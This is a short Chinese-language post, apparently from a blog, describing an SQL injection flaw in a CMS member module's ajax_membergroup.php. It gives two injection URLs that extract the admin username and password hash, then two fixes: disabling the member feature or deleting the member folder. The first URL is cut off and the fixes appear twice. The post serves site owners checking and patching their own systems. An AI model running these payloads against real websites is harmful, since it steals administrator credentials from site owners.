测试你的网站:
账号:
http://www.xxx.com/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20o
密码:
http://www.xxx.com/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
解决方法:
1)系统,系统基本参数,会员设置,是否开启会员功能: 否
2)更简单,更安全的方法 直接将member文件夹删除
1)系统,系统基本参数,会员设置,是否开启会员功能: 否
2)更简单,更安全的方法 直接将member文件夹删除
如果本文对你有帮助,欢迎打赏本站